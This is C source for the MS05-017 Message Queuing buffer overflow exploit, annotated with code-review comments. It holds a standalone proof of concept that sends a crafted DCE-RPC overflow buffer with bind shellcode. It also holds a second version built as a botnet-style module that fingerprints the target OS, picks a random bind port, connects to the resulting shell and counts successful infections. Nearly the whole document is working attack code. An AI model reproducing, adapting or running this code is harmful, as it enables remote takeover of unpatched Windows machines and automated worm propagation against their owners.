/*
 * Entry point of the MS05-017 (Message Queuing) proof-of-concept listing.
 * Command line: <host> <port> <netbios name> <bind port> [count].
 *
 * Flow as visible in this body: resolve the host, open a TCP connection,
 * send a DCE-RPC bind built by dce_rpc_bind() for the UUID in `endp`, read
 * one reply (length checked, contents ignored), then send `count` copies of
 * a fixed 4172-byte buffer.  dce_rpc_bind, convert_name, NOP,
 * dce_rpc_header1/2/3, tag_private, offsets, bind_shellcode and
 * SET_PORTBIND_PORT are defined elsewhere in the file and are not shown
 * here.  Returns 0; every error path calls exit(0) or returns 0, so the
 * exit status does not distinguish failure from success.
 */
int
main (int argc, char **argv)
{

	/* UUID-formatted string handed to dce_rpc_bind() as the endpoint. */
	unsigned char endp[] = "fdb3a030-065f-11d1-bb9b-00a024ea5525";
	unsigned char *packet = NULL;
	unsigned short bindport;
	unsigned long cnt;            /* byte length filled in by dce_rpc_bind() */
	struct sockaddr_in addr;
	struct hostent *he;
	int len, cpkt = 1;            /* cpkt: number of payload sends, default 1 */
	int sockfd;
	char recvbuf[4096];           /* bind reply; only its length is examined */
	char *buff, *ptr;
#ifdef _WIN32  
	WSADATA wsa;  
#endif  


	printf("\n      (MS05-017) Message Queuing Buffer Overflow Vulnerability\n\n");
	printf("\t     Copyright (c) 2004-2005 .: houseofdabus :.\n\n\n");


	/* Four positional arguments are mandatory; [count] is read near the end. */
	if (argc < 5) {
		printf("%s <host> <port> <netbios name> <bind port> [count]\n", argv[0]);
		printf("\nMSMQ ports: 2103, 2105, 2107\n");
		printf("count - number of packets. for Win2k Server/AdvServer = 6-8\n\n");
		exit(0);
	}

#ifdef _WIN32  
	/* NOTE(review): WSAStartup's return value is not checked. */
	WSAStartup(MAKEWORD(2,0), &wsa);  
#endif  

	if ((he = gethostbyname(argv[1])) == NULL) {
		printf("[-] Unable to resolve %s\n", argv[1]);
		return 0;
	}

	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
		printf("[-] create socket failed\n");
		exit(0);
	}

	addr.sin_family = AF_INET;
	/* atoi() gives no range or format validation of the port argument. */
	addr.sin_port = htons((short)atoi(argv[2]));
	/* First address of the resolved host; any others are ignored. */
	addr.sin_addr = *((struct in_addr *)he->h_addr);  
	memset(&(addr.sin_zero), '\0', 8);

	printf("\n[*] Connecting to %s:%u ... ", argv[1], atoi(argv[2]));
	if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
		printf("\n[-] connect failed!\n");
		exit(0);
	}
	printf("OK\n");

	/* Heap-allocated by dce_rpc_bind() (it is free()d below); cnt receives its length. */
	packet = dce_rpc_bind(0, endp, 1, &cnt);

	if (send(sockfd, packet, cnt, 0) == -1) {
		printf("[-] send failed\n");
		exit(0);
	}

	/* The reply is only required to be non-empty; it is never parsed. */
	len = recv(sockfd, recvbuf, 4096, 0);
	if (len <= 0) {
		printf("[-] recv failed\n");
		exit(0);
	}
	free(packet);

	printf("[*] Attacking...");

	/* NOTE(review): malloc() result is not checked before memset(). */
	buff = (char *) malloc(4172);
	memset(buff, NOP, 4172);   /* NOP is a macro/constant defined elsewhere */

	ptr = buff;
	memcpy(ptr, dce_rpc_header1, sizeof(dce_rpc_header1)-1);
	ptr += sizeof(dce_rpc_header1)-1;

	// Remote NetBIOS name
	/* convert_name() is defined elsewhere; the advance of strlen()*2 suggests
	 * two output bytes per input character.  NOTE(review): nothing bounds
	 * argv[3] against the remaining space in the 4172-byte buffer. */
	convert_name(ptr, argv[3]);
	ptr += strlen(argv[3])*2;

	memcpy(ptr, tag_private, sizeof(tag_private)-1);
	ptr += sizeof(tag_private)-1;

	/* Fixed 1048-byte stride; these writes overwrite whatever the sequential
	 * section above left at those offsets. */
	memcpy(buff+1048,   dce_rpc_header2, sizeof(dce_rpc_header2)-1);
	memcpy(buff+1048*2, dce_rpc_header2, sizeof(dce_rpc_header2)-1);
	memcpy(buff+1048*3, dce_rpc_header3, sizeof(dce_rpc_header3)-1);

	// offsets
	ptr = buff;
	ptr += 438;
	memcpy(ptr, offsets, sizeof(offsets)-1);
	ptr += sizeof(offsets)-1;

	// shellcode
	/* The bind port is XOR-ed with 0x0437 before SET_PORTBIND_PORT() patches
	 * it into bind_shellcode; the inverse step is presumably inside the
	 * shellcode, which is not visible here. */
	bindport = (unsigned short)atoi(argv[4]);
	bindport ^= 0x0437;
	SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
	memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);

	/* Last two bytes forced to zero regardless of what was copied above. */
	buff[4170] = '\0';
	buff[4171] = '\0';

	/* Only exactly six arguments enable [count]; a negative value never
	 * reaches zero in the loop below and decrements into signed overflow. */
	if (argc == 6) cpkt = atoi(argv[5]);

	while (cpkt--) {
		printf(".");
		if (send(sockfd, buff, 4172, 0) == -1) {
			printf("\n[-] send failed\n");
			exit(0);
		}
	}
	printf(" OK\n");

	/* sockfd is never closed and buff is never freed; both are reclaimed at
	 * process exit. */

return 0;
}
/*
 * Same MS05-017 packet sequence as the standalone listing, repackaged as a
 * function driven by an EXINFO record (exinfo.ip, exinfo.port,
 * exinfo.exploit) instead of argv.  Network calls go through f*-prefixed
 * wrappers (fsocket, fconnect, fsend, fhtons, finet_addr, fclosesocket).
 * fNetWkstaGetInfo, GetRemoteComputerName, msmq_convert_name, brandom,
 * FpHost, ConnectShellEx, the exploit[] table and the OS_* / FP_RPC
 * constants are all defined elsewhere and are not visible here.
 *
 * Returns TRUE only when ConnectShellEx() reports success; every failure
 * path returns FALSE.  Several failure paths below return without closing
 * the socket or freeing `buff`/`packet` (see inline notes).
 */
BOOL MSMQ(EXINFO exinfo)
{
	/* fNetWkstaGetInfo is only tested for non-NULL here; it is not called
	 * in this body (presumably a function pointer resolved elsewhere). */
	if(!fNetWkstaGetInfo) { return FALSE; }
    char* cname;
    /* UUID-formatted string handed to dce_rpc_bind() as the endpoint. */
    char endp[] = "fdb3a030-065f-11d1-bb9b-00a024ea5525";
    char *packet = NULL;
    unsigned short bindport;
    unsigned long cnt;            /* byte length filled in by dce_rpc_bind() */
    struct sockaddr_in addr;
    int len, cpkt = 1;            /* cpkt: number of payload sends, default 1 */
    int sockfd;
    char recvbuf[4096];           /* bind reply; only its length is examined */
    char *buff, *ptr;
    if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) < 0)
        return FALSE;

    addr.sin_family = AF_INET;
    addr.sin_port = fhtons(exinfo.port);
    /* NOTE(review): the address conversion result is not checked for failure. */
    addr.sin_addr.s_addr = finet_addr(exinfo.ip);
    memset(&(addr.sin_zero), '\0', 8);

    /* NOTE(review): returns without fclosesocket(sockfd); the same applies to
     * the send/recv/name failures and the send failure in the loop below. */
    if (fconnect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0)
        return FALSE;

    /* packet is freed on the two failure paths but never on the success
     * path, so it leaks whenever the function continues past the recv. */
    packet = dce_rpc_bind(0, endp, 1, &cnt);
    if (fsend(sockfd, packet, cnt, 0) == -1) { free(packet); return FALSE; }
    /* Plain recv() here, unlike the f*-wrapped calls elsewhere; the reply is
     * only required to be non-empty and is never parsed. */
    len = recv(sockfd, recvbuf, 4096, 0);
    if (len <= 0) { free(packet); return FALSE; }

    /* cname ownership is not visible here (GetRemoteComputerName is defined
     * elsewhere); it is never freed in this body.  NOTE(review): strlen() is
     * applied without a NULL check — confirm the callee never returns NULL. */
    cname = GetRemoteComputerName(exinfo.ip);
	if(strlen(cname) == 0) { return FALSE; }

    /* NOTE(review): malloc() result is not checked before memset(). */
    buff = (char *) malloc(4172);
    memset(buff, NOP, 4172);   /* NOP is a macro/constant defined elsewhere */

    ptr = buff;
    memcpy(ptr, dce_rpc_header1, sizeof(dce_rpc_header1)-1);
    ptr += sizeof(dce_rpc_header1)-1;

    /* msmq_convert_name() is defined elsewhere; the advance of strlen()*2
     * suggests two output bytes per input character.  Nothing bounds cname
     * against the remaining space in the 4172-byte buffer. */
    msmq_convert_name(ptr, cname);
    ptr += strlen(cname)*2;

    memcpy(ptr, tag_private, sizeof(tag_private)-1);
    ptr += sizeof(tag_private)-1;

    /* Fixed 1048-byte stride; these writes overwrite whatever the sequential
     * section above left at those offsets. */
    memcpy(buff+1048, dce_rpc_header2, sizeof(dce_rpc_header2)-1);
    memcpy(buff+1048*2, dce_rpc_header2, sizeof(dce_rpc_header2)-1);
    memcpy(buff+1048*3, dce_rpc_header3, sizeof(dce_rpc_header3)-1);

    ptr = buff;
    ptr += 438;
    memcpy(ptr, offsets, sizeof(offsets)-1);
    ptr += sizeof(offsets)-1;

	/* Listener port chosen by brandom() (range presumably inclusive
	 * 1337..65535 — defined elsewhere); the same value is later passed to
	 * ConnectShellEx().  The XOR with 0x0437 mirrors the standalone listing. */
	int bp = brandom(1337,65535);
    bindport = (unsigned short)bp;
    bindport ^= 0x0437;
    SET_PORTBIND_PORT(bind_shellcode, fhtons(bindport));
    memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);

    /* Last two bytes forced to zero regardless of what was copied above. */
    buff[4170] = '\0';
    buff[4171] = '\0';

	/* Packet count picked from an RPC fingerprint of the host; any other
	 * result keeps the default of 1. */
	int TargetOS = FpHost(exinfo.ip, FP_RPC);
	if(TargetOS == OS_WIN2K) cpkt = 8;
	if(TargetOS == OS_WINXP) cpkt = 1;

    while (cpkt--) {
        /* NOTE(review): this return leaks buff and leaves sockfd open. */
        if (fsend(sockfd, buff, 4172, 0) == -1) {
            return FALSE;
        }
    }
	fclosesocket(sockfd);
    Sleep(500);
	free(buff);
	/* Style: ConnectShellEx's result is compared against C++-style `true`
	 * while this function itself returns the BOOL TRUE/FALSE macros. */
	if(ConnectShellEx(exinfo, bp) == true) { exploit[exinfo.exploit].stats++; return TRUE;}
    return FALSE;
}